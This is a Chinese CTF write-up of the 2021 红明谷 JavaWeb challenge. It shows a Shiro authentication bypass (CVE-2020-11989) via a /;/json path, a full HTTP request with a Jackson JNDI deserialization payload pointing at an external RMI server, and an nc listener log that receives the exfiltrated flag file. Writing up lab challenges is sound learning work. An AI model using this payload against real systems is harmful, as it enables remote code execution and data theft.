[红明谷CTF 2021]JavaWeb

在复现强网拟态的那题Java，原来差不多算是今年红明谷的原题，所以到buuctf上复现了一下，熟悉一下攻击的流程，之后学习具体的技术细节。

首先进入页面一看到那个500页面就知道是Spring或者SpringBoot了（还是不太了解，之后再去好好学学）。访问/login会提示/json，再访问/json又会302返回/login，很明显是需要登录得了，传点东西：

username=1&password=1

提示登录失败，但是cookie里带了rememberMe=deleteMe;，是个shiro，需要利用CVE-2020-11989（Apache Shiro 身份验证绕过漏洞）：

POST /;/json HTTP/1.1
Host: abdae116-e772-4ce0-8860-b85dbc7f27c2.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
cookie: JSESSIonID=E00995E63A26DD274E5BAB6C330E7518
Connection: close
Content-Type: application/json
Content-Length: 98

["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://121.5.169.223:1099/6dzonl"}]

攻击成功，接收到flag：

root@VM-0-6-ubuntu:~# nc -lvvp 39767
Listening on [0.0.0.0] (family 0, port 39767)
Connection from 117.21.200.166 52663 received!
POST / HTTP/1.1
User-Agent: curl/7.38.0
Host: 121.5.169.223:39767
Accept: */*
Content-Length: 239
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------644113426ad92d3d

--------------------------644113426ad92d3d
Content-Disposition: form-data; name="file"; filename="flag"
Content-Type: application/octet-stream

flag{056d95fc-e903-41c0-9158-9c559701ee9c}

--------------------------644113426ad92d3d--